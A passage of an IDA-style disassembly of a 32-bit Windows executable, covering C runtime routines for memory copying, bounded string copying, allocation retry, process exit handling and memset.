and edx, 3
cmp ecx, 8
jb short loc_4077A4
rep movsd
jmp ds:off_407894[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_407784: ; CODE XREF: sub_407720+4Dj
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_40779C
and eax, 3
add ecx, eax
jmp dword ptr ds:loc_4077A4+4[eax*4]
; ---------------------------------------------------------------------------
loc_40779C: ; CODE XREF: sub_407720+6Ej
jmp dword ptr ds:loc_4078A4[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4077A4: ; CODE XREF: sub_407720+58j
; sub_407720+B6j ...
jmp ds:off_407828[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4077B8
dd offset loc_4077E4
dd offset loc_407808
; ---------------------------------------------------------------------------
loc_4077B8: ; DATA XREF: sub_407720+8Co
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_4077A4
rep movsd
jmp ds:off_407894[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_4077E4: ; DATA XREF: sub_407720+90o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_4077A4
rep movsd
jmp ds:off_407894[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_407808: ; DATA XREF: sub_407720+94o
and edx, ecx
mov al, [esi]
mov [edi], al
add esi, 1
shr ecx, 2
add edi, 1
cmp ecx, 8
jb short loc_4077A4
rep movsd
jmp ds:off_407894[edx*4]
; ---------------------------------------------------------------------------
align 4
off_407828 dd offset loc_40788B ; DATA XREF: sub_407720:loc_4077A4r
dd offset loc_407878
dd offset loc_407870
dd offset loc_407868
dd offset loc_407860
dd offset loc_407858
dd offset loc_407850
dd offset loc_407848
; ---------------------------------------------------------------------------
loc_407848: ; CODE XREF: sub_407720:loc_4077A4j
; DATA XREF: sub_407720+124o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_407850: ; CODE XREF: sub_407720:loc_4077A4j
; DATA XREF: sub_407720+120o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_407858: ; CODE XREF: sub_407720:loc_4077A4j
; DATA XREF: sub_407720+11Co
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_407860: ; CODE XREF: sub_407720:loc_4077A4j
; DATA XREF: sub_407720+118o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_407868: ; CODE XREF: sub_407720:loc_4077A4j
; DATA XREF: sub_407720+114o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_407870: ; CODE XREF: sub_407720:loc_4077A4j
; DATA XREF: sub_407720+110o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_407878: ; CODE XREF: sub_407720:loc_4077A4j
; DATA XREF: sub_407720+10Co
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_40788B: ; CODE XREF: sub_407720:loc_4077A4j
; DATA XREF: sub_407720:off_407828o
jmp ds:off_407894[edx*4]
; ---------------------------------------------------------------------------
align 4
off_407894 dd offset loc_4078A4 ; DATA XREF: sub_407720+5Cr
; sub_407720+BAr ...
dd offset loc_4078AC
dd offset loc_4078B8
dd offset loc_4078CC
; ---------------------------------------------------------------------------
loc_4078A4: ; CODE XREF: sub_407720+5Cj
; sub_407720+BAj ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4078AC: ; CODE XREF: sub_407720+5Cj
; sub_407720+BAj ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4078B8: ; CODE XREF: sub_407720+5Cj
; sub_407720+BAj ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4078CC: ; CODE XREF: sub_407720+5Cj
; sub_407720+BAj ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4078E4: ; CODE XREF: sub_407720+1Aj
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_407918
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_40790C
std
rep movsd
cld
jmp ds:off_407A30[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_40790C: ; CODE XREF: sub_407720+1DDj
; sub_407720+238j ...
neg ecx
jmp ds:off_4079E0[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_407918: ; CODE XREF: sub_407720+1D2j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_407930
and eax, 3
sub ecx, eax
jmp dword ptr ds:loc_407930+4[eax*4]
; ---------------------------------------------------------------------------
loc_407930: ; CODE XREF: sub_407720+202j
; DATA XREF: sub_407720+209r
jmp ds:off_407A30[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_407943+1
; ---------------------------------------------------------------------------
push 90004079h
jns short loc_407983
loc_407943: ; DATA XREF: sub_407720+218o
add [edx-2EDCFCBAh], cl
mov [edi+3], al
sub esi, 1
shr ecx, 2
sub edi, 1
cmp ecx, 8
jb short loc_40790C
std
rep movsd
cld
jmp ds:off_407A30[edx*4]
; ---------------------------------------------------------------------------
align 4
dd 2303468Ah, 34788D1h, 0C102468Ah, 478802E9h, 2EE8302h
dd 8302EF83h
db 0F9h, 8, 72h
; ---------------------------------------------------------------------------
loc_407983: ; CODE XREF: sub_407720+221j
mov ch, bh
rep movsd
cld
jmp ds:off_407A30[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_40790C
std
rep movsd
cld
jmp ds:off_407A30[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4079E4
dd offset loc_4079EC
dd offset loc_4079F4
dd offset loc_4079FC
dd offset loc_407A04
dd offset loc_407A0C
dd offset loc_407A14
off_4079E0 dd offset loc_407A27 ; DATA XREF: sub_407720+1EEr
; ---------------------------------------------------------------------------
loc_4079E4: ; DATA XREF: sub_407720+2A4o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_4079EC: ; DATA XREF: sub_407720+2A8o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_4079F4: ; DATA XREF: sub_407720+2ACo
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_4079FC: ; DATA XREF: sub_407720+2B0o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_407A04: ; DATA XREF: sub_407720+2B4o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_407A0C: ; DATA XREF: sub_407720+2B8o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_407A14: ; DATA XREF: sub_407720+2BCo
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_407A27: ; CODE XREF: sub_407720+1EEj
; DATA XREF: sub_407720:off_4079E0o
jmp ds:off_407A30[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_407A30 dd offset loc_407A40 ; DATA XREF: sub_407720+1E3r
; sub_407720:loc_407930r ...
dd offset loc_407A48
dd offset loc_407A58
dd offset loc_407A6C
; ---------------------------------------------------------------------------
loc_407A40: ; CODE XREF: sub_407720+1E3j
; sub_407720:loc_407930j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407A48: ; CODE XREF: sub_407720+1E3j
; sub_407720:loc_407930j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407A58: ; CODE XREF: sub_407720+1E3j
; sub_407720:loc_407930j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407A6C: ; CODE XREF: sub_407720+1E3j
; sub_407720:loc_407930j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_407720 endp
; =============== S U B R O U T I N E =======================================
sub_407A85 proc near ; CODE XREF: sub_402FD8+31p
; sub_40303E+3Dp ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_0]
push ebx
xor ebx, ebx
cmp ecx, ebx
push esi
push edi
jz short loc_407A9A
mov edi, [esp+0Ch+arg_4]
cmp edi, ebx
ja short loc_407AB5
loc_407A9A: ; CODE XREF: sub_407A85+Bj
; sub_407A85+3Aj
call sub_405B83
push 16h
pop esi
mov [eax], esi
loc_407AA4: ; CODE XREF: sub_407A85+5Dj
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_403305
add esp, 14h
mov eax, esi
jmp short loc_407AE6
; ---------------------------------------------------------------------------
loc_407AB5: ; CODE XREF: sub_407A85+13j
mov esi, [esp+0Ch+arg_8]
cmp esi, ebx
jnz short loc_407AC1
mov [ecx], bl
jmp short loc_407A9A
; ---------------------------------------------------------------------------
loc_407AC1: ; CODE XREF: sub_407A85+36j
mov edx, ecx
loc_407AC3: ; CODE XREF: sub_407A85+49j
mov al, [esi]
mov [edx], al
inc edx
inc esi
cmp al, bl
jz short loc_407AD0
dec edi
jnz short loc_407AC3
loc_407AD0: ; CODE XREF: sub_407A85+46j
cmp edi, ebx
jnz short loc_407AE4
mov [ecx], bl
call sub_405B83
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_407AA4
; ---------------------------------------------------------------------------
loc_407AE4: ; CODE XREF: sub_407A85+4Dj
xor eax, eax
loc_407AE6: ; CODE XREF: sub_407A85+2Ej
pop edi
pop esi
pop ebx
retn
sub_407A85 endp
; =============== S U B R O U T I N E =======================================
sub_407AEA proc near ; CODE XREF: sub_405019+3Bp
; sub_405CE4+48p ...
arg_0 = dword ptr 4
push esi
push edi
xor esi, esi
loc_407AEE: ; CODE XREF: sub_407AEA+39j
push [esp+8+arg_0]
call sub_403AAC
mov edi, eax
test edi, edi
pop ecx
jnz short loc_407B25
cmp dword_427AD0, eax
jbe short loc_407B25
push esi
call ds:off_41D0F8
lea eax, [esi+3E8h]
cmp eax, dword_427AD0
jbe short loc_407B1E
or eax, 0FFFFFFFFh
loc_407B1E: ; CODE XREF: sub_407AEA+2Fj
cmp eax, 0FFFFFFFFh
mov esi, eax
jnz short loc_407AEE
loc_407B25: ; CODE XREF: sub_407AEA+12j
; sub_407AEA+1Aj
mov eax, edi
pop edi
pop esi
retn
sub_407AEA endp
; =============== S U B R O U T I N E =======================================
sub_407B2A proc near ; CODE XREF: sub_403182+5p
; sub_4056CA+30p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
xor esi, esi
loc_407B2E: ; CODE XREF: sub_407B2A+41j
push 0
push [esp+0Ch+arg_4]
push [esp+10h+arg_0]
call sub_40DCFF
mov edi, eax
add esp, 0Ch
test edi, edi
jnz short loc_407B6D
cmp dword_427AD0, eax
jbe short loc_407B6D
push esi
call ds:off_41D0F8
lea eax, [esi+3E8h]
cmp eax, dword_427AD0
jbe short loc_407B66
or eax, 0FFFFFFFFh
loc_407B66: ; CODE XREF: sub_407B2A+37j
cmp eax, 0FFFFFFFFh
mov esi, eax
jnz short loc_407B2E
loc_407B6D: ; CODE XREF: sub_407B2A+1Aj
; sub_407B2A+22j
mov eax, edi
pop edi
pop esi
retn
sub_407B2A endp
; =============== S U B R O U T I N E =======================================
sub_407B72 proc near ; CODE XREF: sub_4030D5+58p
; sub_4030D5+6Fp
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
xor esi, esi
loc_407B76: ; CODE XREF: sub_407B72+44j
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_40DE1D
mov edi, eax
test edi, edi
pop ecx
pop ecx
jnz short loc_407BB8
cmp [esp+8+arg_4], eax
jz short loc_407BB8
cmp dword_427AD0, eax
jbe short loc_407BB8
push esi
call ds:off_41D0F8
lea eax, [esi+3E8h]
cmp eax, dword_427AD0
jbe short loc_407BB1
or eax, 0FFFFFFFFh
loc_407BB1: ; CODE XREF: sub_407B72+3Aj
cmp eax, 0FFFFFFFFh
mov esi, eax
jnz short loc_407B76
loc_407BB8: ; CODE XREF: sub_407B72+17j
; sub_407B72+1Dj ...
mov eax, edi
pop edi
pop esi
retn
sub_407B72 endp
; =============== S U B R O U T I N E =======================================
sub_407BBD proc near ; CODE XREF: sub_409188+40p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
xor esi, esi
loc_407BC1: ; CODE XREF: sub_407BBD+49j
push [esp+8+arg_8]
push [esp+0Ch+arg_4]
push [esp+10h+arg_0]
call sub_40E038
mov edi, eax
add esp, 0Ch
test edi, edi
jnz short loc_407C08
cmp [esp+8+arg_8], eax
jz short loc_407C08
cmp dword_427AD0, eax
jbe short loc_407C08
push esi
call ds:off_41D0F8
lea eax, [esi+3E8h]
cmp eax, dword_427AD0
jbe short loc_407C01
or eax, 0FFFFFFFFh
loc_407C01: ; CODE XREF: sub_407BBD+3Fj
cmp eax, 0FFFFFFFFh
mov esi, eax
jnz short loc_407BC1
loc_407C08: ; CODE XREF: sub_407BBD+1Cj
; sub_407BBD+22j ...
mov eax, edi
pop edi
pop esi
retn
sub_407BBD endp
; =============== S U B R O U T I N E =======================================
sub_407C0D proc near ; CODE XREF: sub_4044D2-D9p
; sub_4044D2-B3p ...
arg_0 = dword ptr 4
call sub_40A004
push [esp+arg_0]
call sub_409E64
push off_423930
call sub_405543
push 0FFh
call eax
add esp, 0Ch
retn
sub_407C0D endp
; =============== S U B R O U T I N E =======================================
sub_407C31 proc near ; CODE XREF: sub_407C57+4p
arg_0 = dword ptr 4
push offset aMscoree_dll ; "mscoree.dll"
call ds:dword_41D0E0 ; GetModuleHandleA
test eax, eax
jz short locret_407C56
push offset aCorexitprocess ; "CorExitProcess"
push eax
call ds:off_41D0E8
test eax, eax
jz short locret_407C56
push [esp+arg_0]
call eax
locret_407C56: ; CODE XREF: sub_407C31+Dj
; sub_407C31+1Dj
retn
sub_407C31 endp
; =============== S U B R O U T I N E =======================================
sub_407C57 proc near ; CODE XREF: sub_403AAC+34p
; sub_40428D+1Cp ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_407C31
pop ecx
push [esp+arg_0]
call ds:off_41D050
int 3 ; Trap to Debugger
sub_407C57 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_407C6C proc near ; CODE XREF: sub_4031B1+Cp
push 8
call sub_405DA7
pop ecx
retn
sub_407C6C endp
; =============== S U B R O U T I N E =======================================
sub_407C75 proc near ; CODE XREF: sub_4031E7p
push 8
call sub_405CCF
pop ecx
retn
sub_407C75 endp
; =============== S U B R O U T I N E =======================================
sub_407C7E proc near ; CODE XREF: sub_407DBB+78p
; sub_407DBB+88p
arg_0 = dword ptr 4
push esi
mov esi, eax
jmp short loc_407C8E
; ---------------------------------------------------------------------------
loc_407C83: ; CODE XREF: sub_407C7E+14j
mov eax, [esi]
test eax, eax
jz short loc_407C8B
call eax
loc_407C8B: ; CODE XREF: sub_407C7E+9j
add esi, 4
loc_407C8E: ; CODE XREF: sub_407C7E+3j
cmp esi, [esp+4+arg_0]
jb short loc_407C83
pop esi
retn
sub_407C7E endp
; =============== S U B R O U T I N E =======================================
sub_407C96 proc near ; CODE XREF: sub_407D29+32p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
xor eax, eax
jmp short loc_407CAE
; ---------------------------------------------------------------------------
loc_407C9F: ; CODE XREF: sub_407C96+1Cj
test eax, eax
jnz short loc_407CB4
mov ecx, [esi]
test ecx, ecx
jz short loc_407CAB
call ecx
loc_407CAB: ; CODE XREF: sub_407C96+11j
add esi, 4
loc_407CAE: ; CODE XREF: sub_407C96+7j
cmp esi, [esp+4+arg_4]
jb short loc_407C9F
loc_407CB4: ; CODE XREF: sub_407C96+Bj
pop esi
retn
sub_407C96 endp
; =============== S U B R O U T I N E =======================================
sub_407CB6 proc near ; CODE XREF: sub_405DD8+12p
; sub_40CEC4+27p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push esi
xor esi, esi
cmp ecx, esi
jnz short loc_407CDE
loc_407CC1: ; CODE XREF: sub_407CB6+2Fj
call sub_405B83
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_403305
add esp, 14h
push 16h
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_407CDE: ; CODE XREF: sub_407CB6+9j
mov eax, dword_427AD8
cmp eax, esi
jz short loc_407CC1
mov [ecx], eax
xor eax, eax
pop esi
retn
sub_407CB6 endp
; =============== S U B R O U T I N E =======================================
sub_407CED proc near ; CODE XREF: sub_405DD8+2Dp
; sub_40F8D4+11Fp
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
xor esi, esi
cmp eax, esi
jnz short loc_407D15
loc_407CF8: ; CODE XREF: sub_407CED+2Ej
call sub_405B83
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_403305
add esp, 14h
push 16h
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_407D15: ; CODE XREF: sub_407CED+9j
cmp dword_427AD8, esi
jz short loc_407CF8
mov ecx, dword_427AE4
mov [eax], ecx
xor eax, eax
pop esi
retn
sub_407CED endp
; =============== S U B R O U T I N E =======================================
sub_407D29 proc near ; CODE XREF: sub_4044D2-9Bp
arg_0 = dword ptr 4
cmp ds:off_41EDA4, 0
jz short loc_407D4C
push offset off_41EDA4
call sub_40D002
test eax, eax
pop ecx
jz short loc_407D4C
push [esp+arg_0]
call ds:off_41EDA4
pop ecx
loc_407D4C: ; CODE XREF: sub_407D29+7j
; sub_407D29+16j
call sub_40D94E
push offset dword_41D2EC
push offset dword_41D2D0
call sub_407C96
test eax, eax
pop ecx
pop ecx
jnz short locret_407DBA
push esi
push edi
push offset sub_40B415
call sub_4031ED
mov esi, offset dword_41D288
mov eax, esi
mov edi, offset dword_41D2CC
cmp eax, edi
pop ecx
jnb short loc_407D92
loc_407D83: ; CODE XREF: sub_407D29+67j
mov eax, [esi]
test eax, eax
jz short loc_407D8B
call eax
loc_407D8B: ; CODE XREF: sub_407D29+5Ej
add esi, 4
cmp esi, edi
jb short loc_407D83
loc_407D92: ; CODE XREF: sub_407D29+58j
cmp dword_436958, 0
pop edi
pop esi
jz short loc_407DB8
push offset dword_436958
call sub_40D002
test eax, eax
pop ecx
jz short loc_407DB8
push 0
push 2
push 0
call dword_436958
loc_407DB8: ; CODE XREF: sub_407D29+72j
; sub_407D29+81j
xor eax, eax
locret_407DBA: ; CODE XREF: sub_407D29+3Bj
retn
sub_407D29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407DBB proc near ; CODE XREF: sub_407E89+8p
; sub_407E9A+8p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 00407E83 SIZE 00000006 BYTES
push 0Ch
push offset dword_421838
call __SEH_prolog4
push 8
call sub_405DA7
pop ecx
and [ebp+ms_exc.disabled], 0
xor esi, esi
inc esi
cmp dword_427B18, esi
jz short loc_407E49
mov dword_427B14, esi
mov al, byte ptr [ebp+arg_8]
mov byte_427B10, al
cmp [ebp+arg_4], 0
jnz short loc_407E39
push dword_436950
call sub_405543
mov edi, eax
push dword_43694C
call sub_405543
pop ecx
pop ecx
mov [ebp+var_1C], eax
test edi, edi
jz short loc_407E29
loc_407E13: ; CODE XREF: sub_407DBB+68j
; sub_407DBB+6Cj
sub [ebp+var_1C], 4
cmp [ebp+var_1C], edi
jb short loc_407E29
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_407E13
call eax
jmp short loc_407E13
; ---------------------------------------------------------------------------
loc_407E29: ; CODE XREF: sub_407DBB+56j
; sub_407DBB+5Fj
push offset dword_41D2FC
mov eax, offset dword_41D2F0
call sub_407C7E
pop ecx
loc_407E39: ; CODE XREF: sub_407DBB+35j
push offset dword_41D308
mov eax, offset dword_41D300
call sub_407C7E
pop ecx
loc_407E49: ; CODE XREF: sub_407DBB+21j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_407E74
cmp [ebp+arg_8], 0
jnz short loc_407E83
mov dword_427B18, esi
push 8
call sub_405CCF
pop ecx
push [ebp+arg_0]
call sub_407C57
loc_407E71: ; DATA XREF: fabskl8p:00421850o
xor esi, esi
inc esi
sub_407DBB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_407E74 proc near ; CODE XREF: sub_407DBB+95p
cmp dword ptr [ebp+10h], 0
jz short locret_407E82
push 8
call sub_405CCF
pop ecx
locret_407E82: ; CODE XREF: sub_407E74+4j
retn
sub_407E74 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_407DBB
loc_407E83: ; CODE XREF: sub_407DBB+9Ej
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_407DBB
; =============== S U B R O U T I N E =======================================
sub_407E89 proc near ; CODE XREF: sub_4044D2-5Fp
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_407DBB
add esp, 0Ch
retn
sub_407E89 endp
; =============== S U B R O U T I N E =======================================
sub_407E9A proc near ; CODE XREF: .text:004044A3p
; sub_40E0D9+D9p ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_407DBB
add esp, 0Ch
retn
sub_407E9A endp
; =============== S U B R O U T I N E =======================================
sub_407EAB proc near ; CODE XREF: sub_4044D2:loc_404478p
push 1
push 0
push 0
call sub_407DBB
add esp, 0Ch
retn
sub_407EAB endp
; =============== S U B R O U T I N E =======================================
sub_407EBA proc near ; CODE XREF: .text:loc_4044A8p
push 1
push 1
push 0
call sub_407DBB
add esp, 0Ch
retn
sub_407EBA endp
; =============== S U B R O U T I N E =======================================
sub_407EC9 proc near ; CODE XREF: sub_405886+C4p
push esi
call sub_40553A
mov esi, eax
push esi
call sub_408408
push esi
call sub_40CEAA
push esi
call sub_4031FF
push esi
call sub_40E293
push esi
call sub_40E289
push esi
call sub_40E07F
push esi
call nullsub_480
push esi
call sub_40C28B
push offset sub_407E9A
call sub_4054D7
add esp, 24h
mov off_423930, eax
pop esi
retn
sub_407EC9 endp
; =============== S U B R O U T I N E =======================================
sub_407F15 proc near ; CODE XREF: sub_403209+CEp
; sub_403305+18p ...
and dword_436944, 0
retn
sub_407F15 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_407F20 proc near ; CODE XREF: sub_40177B+4Ap
; sub_40177B+5Ep ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_407F95
xor eax, eax
mov al, [esp+arg_4]
test al, al
jnz short loc_407F4C
cmp edx, 100h
jb short loc_407F4C
cmp dword_435800, 0
jz short loc_407F4C
jmp sub_40E2F4
; ---------------------------------------------------------------------------
loc_407F4C: ; CODE XREF: sub_407F20+14j
; sub_407F20+1Cj ...
push edi
mov edi, ecx
cmp edx, 4
jb short loc_407F85
neg ecx
and ecx, 3
jz short loc_407F67
sub edx, ecx
loc_407F5D: ; CODE XREF: sub_407F20+45j
mov [edi], al
add edi, 1
sub ecx, 1
jnz short loc_407F5D
loc_407F67: ; CODE XREF: sub_407F20+39j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_407F85
rep stosd
test edx, edx
jz short loc_407F8F
loc_407F85: ; CODE XREF: sub_407F20+32j
; sub_407F20+5Dj ...
mov [edi], al
add edi, 1
sub edx, 1
jnz short loc_407F85
loc_407F8F: ; CODE XREF: sub_407F20+63j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_407F95: ; CODE XREF: sub_407F20+Aj
mov eax, [esp+arg_0]
retn
sub_407F20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407FA0 proc near ; CODE XREF: sub_40333E+43p
; sub_409188+35p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_407FC0
cmp edi, eax
jb loc_408164
loc_407FC0: ; CODE XREF: sub_407FA0+16j
cmp ecx, 100h
jb short loc_407FE7
cmp dword_435800, 0
jz short loc_407FE7
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jnz short loc_407FE7
pop esi
pop edi
pop ebp
jmp sub_40DC1C
; ---------------------------------------------------------------------------
loc_407FE7: ; CODE XREF: sub_407FA0+26j
; sub_407FA0+2Fj ...
test edi, 3
jnz short loc_408004
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_408024
rep movsd
jmp ds:off_408114[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_408004: ; CODE XREF: sub_407FA0+4Dj
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_40801C
and eax, 3
add ecx, eax
jmp dword ptr ds:loc_408024+4[eax*4]
; ---------------------------------------------------------------------------
loc_40801C: ; CODE XREF: sub_407FA0+6Ej
jmp dword ptr ds:loc_408124[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_408024: ; CODE XREF: sub_407FA0+58j
; sub_407FA0+B6j ...
jmp ds:off_4080A8[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_408038
dd offset loc_408064
dd offset loc_408088
; ---------------------------------------------------------------------------
loc_408038: ; DATA XREF: sub_407FA0+8Co
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_408024
rep movsd
jmp ds:off_408114[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_408064: ; DATA XREF: sub_407FA0+90o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_408024
rep movsd
jmp ds:off_408114[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_408088: ; DATA XREF: sub_407FA0+94o
and edx, ecx
mov al, [esi]
mov [edi], al
add esi, 1
shr ecx, 2
add edi, 1
cmp ecx, 8
jb short loc_408024
rep movsd
jmp ds:off_408114[edx*4]
; ---------------------------------------------------------------------------
align 4
off_4080A8 dd offset loc_40810B ; DATA XREF: sub_407FA0:loc_408024r
dd offset loc_4080F8
dd offset loc_4080F0
dd offset loc_4080E8
dd offset loc_4080E0
dd offset loc_4080D8
dd offset loc_4080D0
dd offset loc_4080C8
; ---------------------------------------------------------------------------
loc_4080C8: ; CODE XREF: sub_407FA0:loc_408024j
; DATA XREF: sub_407FA0+124o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_4080D0: ; CODE XREF: sub_407FA0:loc_408024j
; DATA XREF: sub_407FA0+120o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_4080D8: ; CODE XREF: sub_407FA0:loc_408024j
; DATA XREF: sub_407FA0+11Co
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_4080E0: ; CODE XREF: sub_407FA0:loc_408024j
; DATA XREF: sub_407FA0+118o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_4080E8: ; CODE XREF: sub_407FA0:loc_408024j
; DATA XREF: sub_407FA0+114o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_4080F0: ; CODE XREF: sub_407FA0:loc_408024j
; DATA XREF: sub_407FA0+110o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_4080F8: ; CODE XREF: sub_407FA0:loc_408024j
; DATA XREF: sub_407FA0+10Co
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_40810B: ; CODE XREF: sub_407FA0:loc_408024j
; DATA XREF: sub_407FA0:off_4080A8o
jmp ds:off_408114[edx*4]
; ---------------------------------------------------------------------------
align 4
